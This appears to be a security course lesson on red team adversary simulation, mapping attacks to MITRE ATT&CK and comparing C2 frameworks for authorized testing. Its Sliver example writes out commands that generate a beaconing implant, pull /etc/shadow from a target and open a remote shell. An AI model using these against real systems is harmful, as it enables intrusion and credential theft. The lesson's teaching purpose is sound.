Chuyển đến nội dung chính

Lesson 21: Red Team — Adversary Simulation

Red team methodology, MITER ATT&CK mapping, C2 frameworks, initial access, persistence, lateral movement, data exfiltration.

🔒 DevSecOps — Lesson 21 Lesson 21: Red Team — Adversary Simulation__HTMLTAG_53___

Performance Testing & Pentest: Enterprise Standard Process 2026

Part 5: Red/Blue/Purple Team & Compliance

xdev.asia

1. Red Team vs Penetration Test

Pentest vs Red Team:

                 Pentest              Red Team
────────────────────────────────────────────────────
Goal:           Find vulns            Test detection
Scope:          Defined targets       Broader scope
Duration:       1-4 weeks             2-6 months
Stealth:        Not required          Essential
Rules:          Strict ROE            Flexible
Reporting:      Vuln list + remediation  TTPs used + gaps
Blue Team:      Usually aware         Usually NOT aware
Success:        # vulns found         Objectives achieved
Focus:          Technical weaknesses  People+Process+Tech

Red Team Objectives (examples):
  ├── Gain domain admin access
  ├── Access customer PII database
  ├── Exfiltrate financial data
  ├── Compromise CI/CD pipeline
  └── Deploy ransomware simulator

2. MITER ATT&CK Framework

MITRE ATT&CK Tactics (Enterprise):

 #  │ Tactic                    │ What
────┼───────────────────────────┼─────────────────────
 1  │ Reconnaissance            │ Gather info on target
 2  │ Resource Development      │ Setup infrastructure
 3  │ Initial Access            │ Get into the network
 4  │ Execution                 │ Run malicious code
 5  │ Persistence               │ Maintain access
 6  │ Privilege Escalation      │ Get higher privileges
 7  │ Defense Evasion           │ Avoid detection
 8  │ Credential Access         │ Steal credentials
 9  │ Discovery                 │ Map the environment
 10 │ Lateral Movement          │ Move to other systems
 11 │ Collection                │ Gather target data
 12 │ Command & Control (C2)    │ Communicate with implant
 13 │ Exfiltration              │ Steal data out
 14 │ Impact                    │ Disrupt operations

ATT&CK Navigator — map your red team TTPs:
  → attack.mitre.org/matrices/enterprise/
Red Team Kill Chain (Example):

Phase 1: Reconnaissance (T1593, T1594, T1589)
  └── OSINT → identify target employees, tech stack

Phase 2: Initial Access (T1566 — Phishing)
  └── Spear-phishing with malicious PDF → macro execution

Phase 3: Execution (T1059 — PowerShell)
  └── PowerShell download cradle → implant beacon

Phase 4: Persistence (T1053 — Scheduled Task)
  └── Create scheduled task for beacon persistence

Phase 5: Defense Evasion (T1027 — Obfuscation)
  └── Encode beacon, AMSI bypass, ETW patching

Phase 6: Credential Access (T1003 — Credential Dump)
  └── Mimikatz → dump NTLM hashes, Kerberos tickets

Phase 7: Lateral Movement (T1021 — Remote Services)
  └── Pass-the-Hash → move to file server

Phase 8: Collection (T1005 — Local Data)
  └── Find sensitive documents on file shares

Phase 9: Exfiltration (T1048 — Alternative Protocol)
  └── DNS tunneling to exfiltrate data

3. Command & Control (C2) Frameworks

Popular C2 Frameworks (2026):

Open Source:
  ├── Sliver       : Go-based, modern, mTLS/HTTP/DNS/WG
  ├── Havoc        : Modern C2, BOF support
  ├── Mythic       : Multi-platform, extensible
  └── Merlin       : HTTP/2, QUIC support

Commercial:
  ├── Cobalt Strike : Industry standard
  └── Brute Ratel  : EDR evasion focused

Comparison:
  ┌──────────────┬────────┬──────┬───────┬──────────┐
  │ Feature      │ Sliver │Havoc │Mythic │Cobalt St │
  ├──────────────┼────────┼──────┼───────┼──────────┤
  │ Price        │ Free   │Free  │Free   │$3,500/yr │
  │ Language     │ Go     │C/C++ │Python │Java      │
  │ Protocols    │ mTLS,  │HTTP/ │Multi  │HTTP,DNS  │
  │              │HTTP,DNS│SMB   │agent  │SMB,TCP   │
  │ Implant OS   │Win/Lin/│Win   │Multi  │Win/Lin   │
  │              │Mac     │      │       │Mac       │
  │ BOF Support  │ ✅     │ ✅   │ ✅    │ ✅       │
  │ EDR Evasion  │ Good   │Good  │Good   │Best      │
  └──────────────┴────────┴──────┴───────┴──────────┘
# --- Sliver C2 — Setup Example ---

# Install Sliver
curl https://sliver.sh/install | sudo bash

# Start Sliver server
sliver-server

# Generate implant
sliver > generate --mtls 10.0.0.100 --os linux --arch amd64 \
  --name linux-beacon --save /tmp/implant

# Start listener
sliver > mtls --lhost 10.0.0.100 --lport 8888

# After implant executes on target:
sliver > sessions
sliver > use [SESSION_ID]

# Post-exploitation
sliver (TARGET) > info
sliver (TARGET) > ifconfig
sliver (TARGET) > ps
sliver (TARGET) > download /etc/shadow /tmp/
sliver (TARGET) > shell   # Interactive shell

# Pivoting
sliver (TARGET) > pivots tcp --bind 0.0.0.0:9000
# Generate beacon that connects through pivot

4. Initial Access Techniques

Initial Access Vectors:

1. Phishing (T1566):
   ├── Email with malicious attachment
   ├── HTML smuggling
   ├── QR code phishing
   └── OAuth token phishing

2. Public-Facing Application (T1190):
   ├── CVE exploitation
   ├── Web shell upload
   └── API vulnerability abuse

3. External Remote Services (T1133):
   ├── VPN credential stuffing
   ├── RDP brute force
   └── SSH key theft

4. Supply Chain (T1195):
   ├── Compromised npm/PyPI packages
   ├── CI/CD pipeline injection
   └── Plugin/extension backdoor

5. Valid Accounts (T1078):
   ├── Leaked credentials (breaches)
   ├── Password spraying
   └── Credential from previous exploit

Phishing Example — HTML Smuggling:
  1. Craft HTML file with embedded payload
  2. JavaScript reconstructs binary from base64
  3. Auto-download when user opens HTML
  4. Bypasses email gateway (no attachment)

5. Persistence & Lateral Movement

Persistence Techniques (T1053, T1136, T1543):

Linux:
  ├── Cron job: /etc/crontab, /var/spool/cron/
  ├── Systemd service: /etc/systemd/system/
  ├── SSH authorized_keys: ~/.ssh/
  ├── LD_PRELOAD: /etc/ld.so.preload
  └── Bashrc/profile: ~/.bashrc

Windows:
  ├── Registry Run keys
  ├── Scheduled Tasks
  ├── WMI Event Subscriptions
  ├── DLL Search Order Hijacking
  └── Startup folder

Cloud:
  ├── IAM user/key creation
  ├── Lambda backdoor function
  ├── OAuth app registration
  └── API key generation

Lateral Movement (T1021, T1550):
  ├── Pass-the-Hash (PtH)
  ├── Pass-the-Ticket (PtT / Golden Ticket)
  ├── SSH key reuse
  ├── Service account abuse
  ├── Kubernetes pod-to-pod
  └── Cloud cross-account role assumption

6. Red Team Reporting

Red Team Report Structure:

1. Executive Summary
   ├── Objectives vs achievements
   ├── Overall security posture
   └── Key business risks identified

2. Methodology
   ├── MITRE ATT&CK mapping
   ├── Timeframe and approach
   └── Rules of Engagement summary

3. Attack Narrative (Story format)
   ├── Day 1-3: Reconnaissance findings
   ├── Day 4-7: Initial access achieved (how)
   ├── Day 8-14: Internal pivoting path
   ├── Day 15-20: Objective achieved (PII accessed)
   └── Timeline with ATT&CK technique IDs

4. Detection Gaps
   ├── What was NOT detected
   ├── What was detected (and time to detect)
   ├── SIEM/EDR/NDR coverage gaps
   └── SOC process gaps

5. Recommendations
   ├── Quick wins (1-30 days)
   ├── Medium term (30-90 days)
   └── Long term (90+ days)

6. MITRE ATT&CK Heat Map
   └── Visual of techniques used vs detected

7. Summary

  • Red Team: Adversary simulation — test detection, not just find vulns
  • MITER ATT&CK: Framework mapping TTPs (14 tactics, 200+ techniques)
  • C2 Frameworks: Sliver, Havoc, Mythic, Cobalt Strike
  • Kill Chain: Recon → Initial Access → Execution → Persistence → Lateral Movement → Exfil
  • Reporting: Attack narrative + detection gaps + ATT&CK heat map

The next article will move to Blue Team — Detection Engineering.